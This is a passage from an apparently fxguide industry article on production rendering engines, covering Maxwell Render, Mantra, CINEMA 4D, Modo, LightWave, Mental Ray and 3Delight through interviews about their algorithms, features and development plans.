    “The main aim of Maxwell is to make the most beautiful images ever,” says Juan Cañada, the Head of Maxwell Render Technology. “That’s the main idea we had in mind when we started the project. Apart from that we wanted to create a very easy to use tool and make it very compatible, so everybody can use it no matter what platform you wanted to use.”

    Image from MTV EMA ident rendered in Maxwell Render by Sehsuct Berlin.

    Image from MTV EMA ident rendered in Maxwell Render by Sehsuct Berlin.

    Maxwell Render is unbiased – this means that the render process will always converge to a physically correct result, without the use of tricks. This is very important both in terms of quality but also ease of use. Maxwell really does mirror the way light works without tricks and hacks.

    So successful has the Maxwell Render been in replicating real world environments it has become the yard stick by which most other solutions are judged ‘correct’ or not. It is no accident the renderer is referred to a ‘Light Simulator’.

    The software can fully capture all light interactions between the elements in a scene, and all lighting calculations are performed using spectral information and high dynamic range data, a good example of this is the sharp caustics which can be rendered using the Maxwell bi-direction ray tracer with some Metropolis Light Transport MLT approach as well.

    Fur rendering in Maxwell

    Grass rendering in Maxwell. Image by Hervé Steff, Meindbender.

    The algorithms of Maxwell use an advanced bi-directional path tracing with a hybrid special Metropolis implementation, that is unique in the industry. Interestingly, in the last few years the whole industry has been moving more towards Maxwell’s ‘physically based lighting and shading approach’, while the Next Limit engineers have been making Maxwell Render faster and better using key technologies such as M.I.S and multi-core threading to optimize the speed in real world production environments.

    Maxwell started out ‘correctly’ according to Cañada so it has recently been mainly about making Maxwell faster and easier to use, since they have no bias or point cloud approach legacy. The team is focused on issues such as Mutli-threading and other practical issues. “I agree at the beginning Maxwell was almost an experiment – ‘lets try and do the most accurate renderer in the world’ – once we were happy with the quality we said – ‘OK, let’s make an interactive renderer – optimize everything’. We have been very focused on Multi-threading so when you had just one or two cores Maxwell might have been slow but now people have 8 or 12 cores. It can even be faster than other solutions in certain situations,” says Cañada. It is common now to use Maxwell for animation, something that was fairly unrealistic just four or five years ago.


    src="http://www.youtube.com/embed/Hr2Bc5qMhE4?rel=0" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    Above: Deadmau5 ‘Professional Griefers’ music video features characters rendered in Maxwell Render by Method Studios.


    Normal path tracing is slowed or confounded by optical phenomena such as bright caustics; chromatic aberration, fluorescence or iridescence. MLT works very well on some of these shots, while being very complex to implement and Cañada will be giving an advanced talk on lighting rendering techniques at this year’s Siggraph 2013 which will cover some of the complexity of attempting a successful MLT implementation and why few people have tried it.

    Want to know more about Maxwell Render? See fxguide's new iBook - From Sim to Render: The Next Limit Story available for free to download.

    Want to know more about Maxwell Render? See fxguide’s new iBook – From Sim to Render: The Next Limit Story available for free to download.

    The Next Limit implementation is not a full MLT but a clever hybrid solution. MLT can also be very fast on complex shots and yet more expensive to render on others. For example, its approach of nodally mapping paths bi-directionally helps it focus in on the problem of say light just coming through a keyhole in a door to a darkened room or to produce very accurate caustics. But a full MLT can be slower than other algorithms when rendering simple scenes. “The power of metropolis is in exploring difficult occurrences and its strongest point is sometimes its weakest point when dealing with simple scenes,” explains Cañada.

    Sometimes with a MLT you can not use all the same sampling techniques you can use with a path tracing system, at least not everywhere in the code. Cañada points out that, “you can not use quasi- Monte Carlo for example in many places – you can of course use some things in some places,” but the Maxwell system is very different, for example Next Limit’s implementation of Maxwell’s MLT, at its core, does not use MIS. There is MIS in Maxwell (extensively) but not in the MLT part of the code.

    While pure MLT does not seem to be favored by any part of the industry, Next Limit believes there is a lot to be learnt from MLT and they are constantly exploring how to improve bi-directional path tracing.

    Rendering food can be extremely hard. Image by Hervé Steff

    Rendering food can be extremely hard. Image by Hervé Steff rendered in Maxwell

    Maxwell Render includes Maxwell FIRE, a fast preview renderer which calculates an image progressively, and so renders can be stopped and resumed at any time. If the renderer is left long it enough it will simply converge to the correct full final solution. It is very good for preview, but normally once an artist is happy with the look, they switch to the production renderer for the final. This approach means that users can get faster feedback but also know the results won’t change in the final render.

    “People were used to traditional workflows with old school renderers where they want to render a lot of passes,” adds Canada. “You just think of Maxwell as a real camera – so you just focus on lighting, focus on materials. You work like a traditional photo developer and you don’t worry too much about the technical details of transport algorithms.”

    Scandinavian by Alfonso Perez

    Scandinavian by Alfonso Perez. Rendered in Maxwell.

    One of the most challenging things for an unbiased renderer is SSS. As stated above, many solutions are point based, Cañada explains that “it is one of the biggest challenges for Maxwell in terms of trying to make something accurate and at the same time fast enough to be used in real life production.” Most approaches are point based. “In Maxwell we will not apply biased techniques, as it is important that Maxwell not only be used in effects to create good images but also in a scientific way, producing predictable results to help you with and guide you in making real world design decisions.” They have developed their own system, which is fast enough for most applications but it is perhaps the main area of current research and development at Next Limit for Maxwell, and Cañada hopes to make “a large contribution soon, perhaps next year.”

    Combined with the multi-light feature, advanced ray tracing, massive scene handling, procedural geometry for fur, hair and particles, and a python SDK for custom tools, Maxwell is a production tool today. In the past the ‘purist’ Maxwell approach could prove too slow for production but with a combination of Moore’s Law and Next Limit’s engineering efforts, the renderer is becomingly increasingly faster and more popular.

    The_gateway

    Maxwell render by Rudolf Herczog. Rendered in Maxwell

    The next release of the product will support new volumetics, alembic, deep compositing and will see Maxwell integrated much more closely with Next Limit’s RealFlow with direct Maxwell previewing built into RealFlow. “There will be between 25 and 30 new features from volumetrics to deep compositing, it is a major release, the biggest release in our history,” explains Cañada.

    RealFlow has been hugely successul in fluid simulation, so providing good rendering visualisation of simulations is a great bonus, after all most sim artists are not necessarily lighters – so easy and high quality renders will just provide the sims team with more information on what the sims will look like. “It will be a milestone for us – now when you open Realflow you will just have Maxwell window inside and when you simulate with RealFlow you can preview with Maxwell inside the application,” says Cañada.


    2.5 Mantra – Side Effects Software

    Side Effects Software’s Houdini product is incredibly successful. In countless films now it seems a Houdini component exists helping with either fluid effects, destruction sequences, smoke, flames or just procedural implementations of complex animation.

    Andrew Lowell, Senior FX Artist and Houdini trainer at fxphd.com, has used Houdini on films like Jack the Giant Slayer, Ender’s Game, Transformers 3, Thor, Sucker Punch, Invictus, Mummy 3 and Aliens in Attic. “Like most things in the Houdini universe, Mantra will deliver everything you ask of it and more as long as the user commits to learning the science of what they’re doing,” says Lowell. “It doesn’t hold anything back or make anything easier. Like many people the first time I fired up a Mantra render I was thoroughly disappointed by the lack of prettiness, a clunky speed, and having to go to a few different places in the software to get in and start adjusting things. But, when it came time to get the job done, Mantra has never let me down. It’s enough to make any lighting department struggling with heavy renders, envious. What at first seems like a slow render on a sphere manifests itself in production as a highly efficient render of millions of particles with full motion blur. What seems like a lot of work to set up a shader ends up being that life-saving modification at a low level to easily give the compositor the AOV’s they need. And what seems like a lack of user interface with ease concerning lighting and submission turn into highly automated and dependent systems in the latter stages of production.”

    h12_waterfall

    Mantra as a renderer in it’s own right can also be optimized for almost any render or situation, such as large crowds, or very large volume renders, “and it has the flexibility to achieve any look on any project,” adds Lowell. “I remember a bit of render engine snobbery from a vfx supervisor saying he would only accept renders from a certain engine and Mantra was the worst you could get (!). We didn’t have time for the lighting department to do look development on the fx so, I simply took the time and textured/lit the elements myself, and mimicked the properties of the other engine. I submitted my final elements as lighting elements. Everyone was on board thinking how well we had lit elements except for the compositing department, who wanted to know why the motion blur was of higher quality.”

    Of course, Houdini could be used for any 3D animation, but it is known for its effects animation more than anything else today. Mantra is included with Houdini. In 2012 fxguide celebrated the 25th anniversary of the company. In that story we wrote:

    According to Nick Van Zutphen, who helped us compile this story, in 1988 a guy in a big wool sweater showed up at the Side Effects office, ‘sheepishly’ looking for a job. That person was Mark Elendt, who at the time was working for an insurance company. The insurance company part didn’t really impress Kim Davidson and Greg Hermanovic, but what they did notice were some photographs Elendt showed taken from an Amiga 1000 screen (with 512kb RAM). It displayed renders of a typical late 80′s ray-traced sphere. “He had written a ray-tracer as a hobby,” says Van Zutphen. “This was the prototype of Mantra, which is Houdini’s native renderer.”

    Mantra is still to this day the Side Effects Houdini packaged renderer. It is very similar in many ways to Pixar’s RenderMan, a renderer that many Houdini customers also use.

    Today Mantra is very much a powerful solid option for rendering, offering one of the best known in-house renderers from any any of the primary 3D vendors. It is very much a tool that could be marketed separately but has always been part of Houdini.

    h12_burning_bridge

    Mantra looks very much like RenderMan:

    • Mantra’s micropolygon rendering is based on the REYES algorithm. It is a divide and conqueralgorithm, a strategy whereby a difficult problem is divided and sub-divided into smaller and smaller problems until it is decomposed into a large number of simple problems. For micropolygon rendering, this takes the form of refinement.

    With raytracing, mantra does not refine geometry if it knows how to ray trace it natively.

    • The raytracing engine has algorithms to do efficient raytracing of points, circles, spheres, tubes, polygons, and mesh geometry.

    “These days it has shifted very much towards the ray tracing approach, we don’t have too many people using micropolygons anymore, unless they are rendering something that can not fit in memory, but the amount of memory on processes these days is quite high, you fit a lot of geometry in memory and use the ray tracer for pretty much anything,” explains Side Effects’ Andrew Clinton, 3D graphics programmer. “There are a lot of techniques handled more efficiently with ray tracing than with micropolygons, like instancing, you can keep a single copy of an object in memory and just trace rays with different transforms whereas with micropolygons you would need to create new shading grids for that object for each instance, which is a lot slower. The other advantage is that if you have polygons smaller than a pixel, you spend a lot of time breaking up objects that are already smaller than a pixel. In ray tracing you just keep the geometry as is and you don’t need to create any additional geometry or data structures so it is efficient memory wise.”

    Mantra has at the kernel of the renderer both the micropolygon renderer and a ray tracing engine, but “there are different renderers built on top of that, we have a pure ray tracer but we also have a physically based rendering system that is built on top of that and it is built using the VEX shading language,” points out Side Effects senior mathematician Mark Elendt.

    The core ray tracer could have a biased or unbiased renderer written on top of it thanks to the flexibility of VEX. “Our physically based renderer is pretty much completely unbiased and it is written in that shading language,” adds Clinton.

    In the physically based renderer the team use MIS for the direct lighting, and the BRDF in the scene. Side Effects has experienced a lot of interest, but actually they built it some time ago, before there was as much interest. And it was “a bit like: if we build it – they will come,” says Elendt, referring to their 2008 initial implementation. Today there is much more interest in physical plausible pipelines, something that has validated a lot of the early work Side Effects did in this area.

    Mantra and Houdini are known for their volumetric work, having won technical Oscars in this general area of research (Micro-voxels). Side Effects was one of the first companies to work with Dreamworks on OpenVDB, partnering with them to help make it open source. The new OpenVDB allows the volumes to cope with very sparse spaces, which really expands Houdini’s Mantra to efficiently render huge spare volumes without huge memory hits. Side Effects really supports open source, also very actively supporting Alembic for example. “One thing we did in 12.5 with Alembic and our own geometry is that we implemented a really efficent polygonal mesh that uses pretty much the minium amount of memory possible, and this really helped with our big fluid sims such as oceans,” explains Clinton.

    They have also done serious work in volumetric lighting, providing say fire as a lighting source, which was a generalization of their area lights to handle volumes as well as surfaces as volumes. “If you have parts like the center of the fire, that are really bright then it was really good from a perspective of sampling, to be able to focus your ray tracing on those parts of the volume, to be able to direct your sample there, it results in really low noise in the render.”

    The next release not only will have improved Alembic support, but new lighting tools for Houdini and Mantra interaction. But as the next release is not until later in the year Side Effects may release support before the next release for OpenEXR 2.0 deep compositing. Mantra has had its own format for some time for deep data but this would be that output in the new OpenEXR 2.0 deep data standard. “The advantage of OpenEXR 2.0 is that you can bring it into Nuke and do compositing there”, says Clinton.


    src="http://player.vimeo.com/video/70560283?title=0&byline=0&portrait=0&color=f24f46" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    Above: Watch the Houdini demo reel 2013.


    Mantra supports SSS using a point cloud approach with an irradiance cache, it is based on a Jenson dipole model. There is a ray tracing and path tracing approach in the lab, but many to have a ground truth to compare the point cloud to. Research is continuing but there are no immediate plans to change the system or approach.

    Mantra continues to improve its speed, this is especially true of the ray tracer. Clinton joked that some work is new algorithms and some stuff is more dumb stuff that was broken. In one isolated case a simple fix on opacity made a huge difference to fur rendering – literally one tweak yielded a render several orders of magnitude faster on complex fur for one client. It is not this simple but “we just played with a constant and got huge improvements!,” joked the team quick to point out that was an unusual “edge case”. Like many other companies Side Effects is working hard on moving things from being single threaded to multi-threaded. Here a really wide benefit can be felt by customers, especially those on newer 8 and 12 core machines.

    Of course, many Side Effects customers use other third party renderers, and Houdini supports RIB output for PRMan, 3Delight, etc and there are plugins for others like V-Ray.


    2.6 CINEMA 4D – Maxon

    Oliver Meiseberg, product manager, Maxon Computer GmbH told fxguide: “CINEMA4D supports other renderers very well, we cover almost any renderer out there in our software. It is up to the user to choose whichever renderer they feel comfortable with and is the best for the project.”

    Astrabike-Kopie

    While most renderers are available, Meiseberg estimates the most popular is easily V-Ray, “but a bunch also use Mental Ray and the large houses use RenderMan.” A new version of CINEMA 4D is expected to be at SIGGRAPH 2013. According to some sources, a third party made bridge to Arnold and support for Krakatoa may be previewed at SIGGRAPH. Thinkbox Software’s Krakatoa is a production-proven volumetric particle rendering and manipulation Toolkit. There may also be a V-Ray update which will be coming. The key area to watch out for with V-Ray is support of light mapping.

    Light mapping (also called light caching) is a technique for approximating GI in a scene. This method was developed by Chaos Group and will be in R15 to be announced on July 23rd. It is very similar to photon mapping, but without many of its limitations. The light cache or map is built by tracing many eye paths from the camera. Each of the bounces in the path stores the illumination from the rest of the path into a 3d structure, very similar to the photon map. But in a sense the exact opposite of the photon map, which traces paths from the lights, and stores the accumulated energy from the beginning of the path into the photon map.

    CINEMA 4D offers two render options. After version 13 there has been a second physical renderer. The light mapping is in the physical renderer for example. “Most people love the physical renderer – the feedback has been awesome, but with tight deadlines – most people go back to the advanced renderer but if you want physically accurate use the new renderer.”

    Divano_2

    The SSS shader was completely rewritten from scratch for version 13, and thus is fairly new. The standard set in SSS with its varying wavelength adjustments has proven popular with customers. Like many users there is a desire amongst C4D users to move to a simpler lighting model, with no loss in quality but with an easier more natural lighting setup phase that behaves more like one might expect and involves less hack and tricks.

    The product is the leading application for motion graphics but it is more and more used in visual effects, and while it is not a primary focus for the company, they are happy with the growth the product has experienced in both the entertainment space and the product visualisation community. Maxon has customers in the automotive industry and many other major product design companies. The main goal remains the motion graphics industry. “It is great to see the product entering other markets – even if we don’t target them,” says Meiseberg.

    Tim Clapham, Luxx,  Discovery Kids ident.

    Tim Clapham, Luxx, Discovery Kids ident.

    One of the biggest coups of the last 6 months is the link between Maxon C4D and Adobe’s After Effects. While not a rendering issue directly it has helped to bring the product to an even wider audience and given the brand vast extra international exposure. You can link from AE to the CINEMA 4D render engine, the render engine is based on the R14 advanced renderer, and not the new physical renderer, but this is coming, says Meiseberg. There is also a live or dynamic link from Premiere to AE which allows teams to work more effectively in a production concurrently. This places C4D renders back into AE and then automatically into Premiere.

    “Cinema 4D entered a new era with the introduction of the physical renderer,” says C4D user and fxphd Prof. Tim Clapham. “Allowing us to use real world camera attributes such as aperture and shutter speed in conjunction with true 3D motion blur and depth of field. This combined with a central location to control global samples for blurry effects, area shadows, sub-surface scattering and occlusion shaders results in enhanced workflow with more realistic renders.”

    Maxon will be at SIGGRAPH 2013.


    2.7 Modo – The Foundry

    Modo from Luxology, now at The Foundry, is expanding on several fronts. Firstly, as a part of The Foundry it is more exposed to the high end effects market, but also because independently key supervisors such as John Knoll, senior visual effects supervisor and now chief creative officer at ILM, have been forthcoming in saying how much they like the clean and fresh user experience of Modo and its renderer. For example, inside Modo there is a spherical projection type for camera item that allows the creation of spherical environment maps, including export of MODO-created panoramic HDRI’s. John Knoll rendered 360 spherical Pacific Rimset images out to his iPad for the film and then he could interactively look around the real set on seeing in real time where the giant Pac Rim machines and bases, cranes etc would be thanks to an app that detects tilt and shift and displays the window onto the Modo rendered ‘set’ interactively. This allowed actors to know where to look and for anyone to judge what the framing should allow for – in effect it was a virtual set – on set – via Modo and an iPad.

    wfqwefqwerrf

    Lois Barros – Arch Pre Viz artist now moving to feature films in Portugal.

    John Knoll (an Oscar winner whose films include but are not limited to Pacific Rim, Mission Impossible: Ghost Protocol, Avatar, Pirates of the Caribbean I, II, III, and Star Wars I,II,III etc) has used Modo since version 201. ILM uses a variety of renderers and Knoll is no different but he seems to genuinely like the Modo tools and renderer for certain projects or tasks.

    Modo is a hybrid renderer, if one keeps an eye on setting it is able to be run as a physically plausible, unbiased way. “In that sense I think it is more like V-Ray, when Allen (Hastings) was writing it (in 2002) he was looking at how we can make it have the scalability that something like RenderMan is known for, but also take advantage of some of the new technologies that were coming out around then,” says co-founder Brad Peebler. Through the use of both biased and unbiased approaches Modo’s renderer includes features like caustics, dispersion, stereoscopic rendering, fresnel effects, subsurface scattering, blurry refractions (e.g. frosted glass), volumetric lighting (smokey bar effect), and Pixar-patented deep shadows.

    The render is not as mature as some, for example its EIS Environment importance Sampling does not yet provide IS on directional lights nor full MIS covering materials, but the EIS does work well for both Monte Carlo and irradiance caching approaches and produces greater realism from HDR light probe captures or approaches. Furthermore the team plan to expand IS throughout the product.

    Peebler points out that every renderer makes pretty pictures and can render photorealistic images, but the key now is getting there faster. “There are two ways you can do that, one is making your rendering engine faster and the other is making it so users don’t have to fiddle with so many values and tweak so many settings.”

    Visual effects by Light VFX.

    Visual effects by Light VFX from The Butterfly’s Dream.

    Some renderers, he states, take the approach that everything is physically based and “you have to just render with the real world settings regardless, and others tilt the other direction, more human time to set it up but it renders it faster, inside Modo. EIS is one of those things that does both – and there aren’t too many of those (!) – it is something Allan has wanted to do for a long time. Allen was actually inspired into the implementation after a conversation we had with Kim Libreri (senior VFX supervisor), John Knoll (ILM chief creative officer) and Hilmar Koch, (head of computer graphics at ILM) about importance sampling.”

    EIS is an aspect of the entertainment industry providing a new tool that has been appreciated by Modo’s architectural clients, and that has been a two way street. In reverse the design and architectural clients requested embedded python, which has been a big boost to many effects and animation customers.

    Modo is one of the companies focused on a variety of markets, pointing out some of their design companies are doing vfx work, but vfx companies like Pixomondo are doing design work to even out production cycles. For Peebler they believe they can cover multiple markets with the same core product, without the need to bifurcate to address them individually. And it is not even just something The Foundry is seeing just with Modo, Apple Inc. owns Nuke licenses, points out Peebler. For Luxology’s R&D team it is key that their render technology cover a range of needs both photoreal rendering and more stylized solutions in a range of markets and countries around the world. “I was at a client – a design client who had a real time visualisation they have a set of screens making up a 15m x 10m LED wall – powered by a 500 cluster render farm – for real time interaction for their car design reviews, it was phenomenal, and from a budget point of view, the design space is vastly larger than the entertainment space,” notes Peebler.

    CG work by Creative Conspiracy.

    CG work by Creative Conspiracy.

    The Modo renderer is provided as both a final render engine and as an optimized preview renderer that updates as you model, paint or change any item property within Modo.

    The Modo renderer uses high dynamic range radiance units throughout its calculations for accuracy and quality. The renderer is highly scalable on multi-core systems, delivering nearly linear speedups as more processors/cores are added. The renderer’s performance is a combination of tight code and a “unique front-end that decouples many key computations, allowing for a finely tuned balance between memory requirements, speed, and final image quality,” explains Peebler. “A client sent me an image that was about 6 trillion polygons that rendered in about 10 minutes, now those are of course a combination of multi-resolution sculpted micro-polys and a ton of instancing but the renderer is not the bottleneck.” Modo 701 now scales better than 601 and “Modo continues to expand in this area of scalability.”

    One very exciting trend is the possibility of Modo and Nuke working more closely together. Nuke deploys only a scanline renderer as standard. Modo’s renderer does not currently support deep compositing, but, says Peebler, “as a company that has the industry’s leading comp system supporting deep compositing, you can imagine we would be ‘interested’ in getting the Modo renderer to support that as well.”

    Another interesting connection is Modo to Mari. Mari is very much a product that is known for its strong Ptex implementation, but Modo is known perhaps much more strongly for its UV work on Avatar and other films since. “We see a lot of benefit in previewing textures with full global illumination. Mari is brilliant at what it does, and you can get good lookdev right there in Mari, but if you want more like sub surface Modo’s renderer is excellent,” suggests Peebler.

    Actually, an artist at ILM, Jacobo Barreiro, on his own, produced a video called Moma – as a proof of concept of Mari and Modo working together. Barreiro internally won ILM’s award for best environment on Star Trek: Into Darkness (future San Fran) and so is thus a very serious artist not just a student or fan boy. Peebler seems very aware of the interest in connecting Modo to the other products and especially rendering through the comp. While The Foundry is render agnostic – the Luxology team and the Nuke developers are perfectly placed to expand complex integration between Modo and Nuke in ways as yet unseen.

    Modo supports toolkits which can extend the capability of the renderer. These include the NPR (non-photo-real) module – popular in Japan. The lead programmer on NPR is actively developing more in this area, and the Studio Lighting Kit – which was one of the most popular extensions especially with photo retouchers who were early Modo adopters.

    Below is the work of artist Rodrigo Gelmi, one of several of his tests suggested by Modo’s Peebler:
    src="http://www.youtube.com/embed/TMGdy_mWDmo" height="360" width="640" allowfullscreen="" frameborder="0" style="margin: 0px; padding: 0px; border-width: 0px; font-weight: inherit; font-style: inherit; font-size: 14.3999996185303px; font-family: inherit; vertical-align: baseline;">

    Modo is more than just a renderer, and Luxology’s workflow fully supports exporting to third party renderers, allowing Modo’s fast preview renderer to aid in modeling. As Peebler says, “we are not in the selling render license business.” They see “our rendering technology as a great enabler for people, we are not trying to disrupt anyone’s pipeline. We are not trying to displace anyone else’s renderer.” For example Maxwell works well with Modo and they are keen to see V-Ray working more with Modo. Currently Peebler estimates only 5% of clients render to a third part renderer and most are either Maxwell or V-Ray.

    Not to short change the Modo renderer for high end work. It is also possible to only use Modo’s renderer on a big production, as proven by the new Luc Besson fully animated feature film being made at Walking the Dog Studios in Brussels – which is being fully rendered in just Modo.

    Exclusive Nuke-Modo Tech Experiment:

    What makes Modo’s renderer incredibly interesting is its sister applications at The Foundry. Connecting Modo to Mari, Katana both makes 3D sense, but the team is exploring much more than that. The Foundry is doing incredible work in exploring Modo, or more specifically Modo’s renderer, with Nuke. This one, complex series of possible connections and interfaces could cause Modo’s renderer to be elevated faster and more significantly than anything in recent times. Nuke is the dominant compositor in high end film and effects. Below is a video showing a test running in R&D. In the video Modo is automatically updating 3D renders in a Nuke setup. Of course it is possible to render a number of passes that would allow Nuke to manipulate a render that has been imported but this is a live connection between the two applications. This was recorded on a laptop running 2.8ghz i7.

    Peebler commented, “This is a “technical sketch” showing what we think workflows might look like in the future. This is not indicative of an intended shipping product. We like to “doodle” a bit with our vast body of combined technologies and we hope that this will spark a conversation with users to help guide us on what users would like to see, and what might be possible.”

    00:00 | 00:00

    A look at a live link between Modo and Nuke

    If you are at SIGGRAPH 2013, we recommend you find a senior Foundry /Luxology staff member- offer your thoughts – and bug them to see more. Watch above or download an HD version:  TF_Labs.mp4


    2.8 Lightwave – Newtek

    Lightwave is very strong in a few markets including the television episodic effects market where sci-fi scripts have called for more and more visual effects.

    Eugenio Garcia Villareal

    Eugenio Garcia Villareal

    Historically, the company has strong user groups in markets outside our scope, but it does influence its approaches to rendering. The company has roots in scanline rendering but since 2006 it has had a fully ray traced solution. Newtek’s Rob Powers (President, NewTek LightWave Group) feels that many smaller companies are keen to use new tools such as are discussed above but found it difficult: “I feel today with the struggles some studios are having to possibly use or adopt the same workflows that possibly highlighted at the very sexy ILM and Weta Digital project level, what I have seen is that a lot of studios are struggling trying to replicate that. We know that a company at the 40 or more staff members is the norm.” And Powers feels LightWave is well positioned to help people and companies in that position.

    While the renderer today supports ray tracing it also supports some of the other features and more traditional approaches. The software has both a nodal based and layered based shader system. “It is kind of like a Lego block system for people who don’t know how to write shaders, and it ships with a bunch of predefined shaders like the skin shader or car paint shader,” says Powers.

    On the whole the ray tracer is a biased approach – a general radiosity solution designed for production, supporting a wide variety of approaches. It is designed to be quick which is more important than ‘correct’ according to NewTek. You can do a brute force approach but it is not normally used that way. It is a tool aimed to be quick and fast and not optically accurate to the extent of other high end renderers.

    Naoya Kurisu

    Naoya Kurisu

    LW has an interactive window in the viewport (VPR). The first VPR was scanline, the next version was a ray tracer (LW 8.6/9), now there is a new version which is very fast and really a third whole approach. It is backward compatible, but the new VPR is really quite impressive. It no longer renders just polygons but it can render lines and other primitives. It also has a new instancing system that is extremely fast.

    “This is really the direction we are moving in not just features but meta-features,” explains Mark Granger, rendering lead at LightWave 3D Group. “For example, when we added the edge rendering we did not just add it as a simple feature we added it with the nodal shaders so that the nodes can control the thickness and color, even full shading of the edges and we think this will be really popular with the Anime community who can make it look like it was done with different brushes just by changing the shaders.” As the lines primitives can have shaders they can have texture maps, gradients and many other types of power from the LW nodal shader system.

    It does not currently have MIS or importance sampling generally, but it is something that the team is considering, and on their planning horizon. The lack of MIS makes running the LW renderer as a full brute force ray tracer option unlikely in a production environment, especially given the fast nature production environments that LW clients live in. It is wonderful to do high end rendering but if you have to get an episode out, have 3 more in the pipe and another 2 being shot – then speed and deliverable results is the key. But episodic television also needs to provide production values often on par with films having months if not years longer in post, and certainly much bigger budgets.

    DEF101

    Still from Defiance.

    LW has managed to provide not only fast and professional results, but thanks to agressive pricing – production can also compete financially, leading more than one client to stop productions moving out of state and letting the work be competitive in say California/Hollywood. Productions such as Defiance and visual effects supervisors such as Gary Hutzel (located on the Universal Studios lot in Los Angeles) have had great success with LW. His work on Blood & Chrome was also covered on fxguide.

    LW has three types of motion blur, dithered, vector and fully ray traced sampled motion blur. Its hair and fibre shaders have now been used widely on shows such as Terra Nova, CSI and Grimm.

    LightWave users can use not only the product’s own renderer but there are also third party renderers such asKray Tracing. There is also an Octane implementation from Otoy for LW users. Most users do use the LW render and its free renderfarm LW license which comes with it.

    DJ Waterman

    DJ Waterman

    NewTek is closely monitoring GPU rendering, their VPR is a fast mutli-threading solution. Mark Granger has worked very closely with Nividia and the original CUDA beta – but he feels that perhaps the price of going down the GPU approach may not be worth it. “The cost of supporting GPU rendering in terms of what we would have to give up in terms of flexibility are so extreme – I dont think it is worth it to us. For a third party plugin it might be interesting – but for the main renderer – in a general purpose package like Lightwave 3D, we really don’t want to give up all the flexibility – like for example giving up being able to work with third party plugin shaders and all the other things that require say large amounts of memory.”

    He also pointed out the rapidly changing nature of GPUs makes it hard to commit, given the ground is moving so fast in this area, and GPU work tends to be very specific. It is not an area they are ignoring, but they feel CPU is their best place to focus.

    LW does not support Ptex as we reported previously, nor do they currently support Alembic, but support for the later might be coming very soon. SIGGRAPH is coming within a fortnight and one might expect 11.6 to be at SIGGRAPH, but the exact roll out is not published yet or known.


    2.9 Mental Ray – Nvidia

    Mental Ray is a ray tracer with MIS, but as a shader allows so much C++, it is hard to say it is unbiased or baised since you can use Mental Ray as just a thing that shoots rays but everything is then done by the shaders. But to be efficient is hard, it is the cost of Mental Ray’s massive flexibility. There is so much legacy code around the code base. It may be that Mental Ray never transitions to a new hybrid efficient renderer. Today, one can run Mental Ray with BRDFs but only the ones provided by the Mental Ray advanced rendering team. Depending on your point of view, Mental Ray is great platform for its flexibility or too code focused for a modern pipeline. The problem is really not if it can render it, but what it takes to set up that render, and maintain that as a modern physically based energy conserving rendering environment (should you choose to want to do that). Most people who want to set up modern new rendering pipelines for large scale production environments are simply not doing that in Mental Ray.

    At the other end of the massive pipeline production render environment are individuals who know how to use it and are keen to just get shots delivered. Lucas Martell is a director and animator who has made some hugely successful short film projects as well as working professionally for many years. “I’ve worked with Mental Ray for years and it’s served our needs very well. A lot of the complaints about Mental Ray come down to its complexity. I feel like it has gotten much simpler in the past few years, but more importantly, those settings do give you some very granular control over the rendering quality/efficiency. Because we already know those settings inside and out, we’ve never run into something that we couldn’t do in MR.”

    “Granted we are a small shop, so the scale we deal with doesn’t come close to the big animation studios, but the integration with Softimage is so great that we haven’t hit the tipping point where investing in a lot of 3rd party licenses makes sense. Plus we have a lot of custom code written to optimize shaders, set up our passes, etc. Renderers are just tools. The best one is the tool you know inside and out.”

    wef

    A frame from the Ocean Maker from Dir. Lucas Martell.

    The image above was rendered by fxphd Prof. and director Lucas Martell. The image was rendered with one key light with final gather. The image took approximately one hour/frame including 3D motion blur. (on a laptop).

    Håkan “Zap” Andersson, now at Autodesk and formerly of Nvidia/Mental Images, pointed out that newer versions of Max and Maya at Autodesk have new parts of Mental Ray available to them such as unified lighting and IBL in say 3ds Max. These are not so much new Mental Ray features so much as they are features now available to artists that previously were not accessible in Mental Ray from these key Autodesk Products.

    As mentioned above, Nvidia for Iray is exploring MDL. But as part of that is the Mental Images Layering Library (MILA). This reflects the same thinking as OSL and could become the implementation of a new shader system for Mental Ray. It is hard to see yet whether Nvidia or Autodesk with some unified solution will lead to a move to OSL or MDL or nothing at all. Not only does Autodesk need to consider their array of programs Softimage, Max, Maya etc but also the fact that so many of their clients use products like V-Ray and not the standard Mental Ray, and V-Ray is now supporting OSL, and would be unlikely to support a hybrid modified Nivida shader solution.

    As Mental Ray comes standard with Autodesk products it is not surprising that indie film makers have worked with Mental Ray and in many respects they are producing some of the best work with it. Below is a great example of indie production by Pedro Conti in this breakdown of ‘One More Beer’, rendered in Mental Ray. Watch the full short here.

    00:00 | 00:00

    Breakdown of ‘One More Beer’.

    Conti says, “I started working on the Viking Project in January of 2011. Over the span of 5 months, I did the illustration but I had plans for an animation. From July to December of 2011, the project was on hold until Alan Camilo (animator) came on to join the project. The animation process took about 2 months of free time, and after the animation process I worked on polishing all details of lighting, shading, compositing, and finalization of the short film. We released ‘One More Beer’ on the 1st of October. So, it was 9 months of hard work – overnights and weekends – to complete it.”

    Lighting setup.

    Lighting setup.

    For the lighting, Conti relied on 10 photometric area lights in Mental Ray with MR exposure control and 1 skylight for the ambient light. “Lots of fakeosity to reach the mood that I was aiming,” he adds. “Final gathering was also used for some extra light bounces. It was rendered in passes. One main beauty pass + additional passes for comp like hair, zdepth, masks, atmospherics. In total it was about 30 passes. For the beauty pass it was about 2 hours/frame, and hair pass about 5 minutes/frame. Additional passes were really fast as it was rendered in Scanline Renderer.”


    2.10 3Delight – DNA Research

    3Delight is a RenderMan compliant renderer, and is used by companies such as Image Engine in Canada. They have been a customer since 2007. They have used it extensively with Cortex (see part 1) and they are one of the renderers’ highest profile customers. Image Engine is always evaluating its rendering options moving forward, but for now it is very happy with the close working relationship it has with DNA Research.

    Zero Dark Thirty - VFX by Image Engine.

    Zero Dark Thirty – VFX by Image Engine.

    Like many other companies they are looking at more physically based lighting and shaders with ray tracing. “Coming off the last few shows we have been reviewing our pipeline and thinking about how we might generally be more efficient and one of those things is simplifying the lighting workflow,” says Image Engine CG supervisor Ben Toogood.

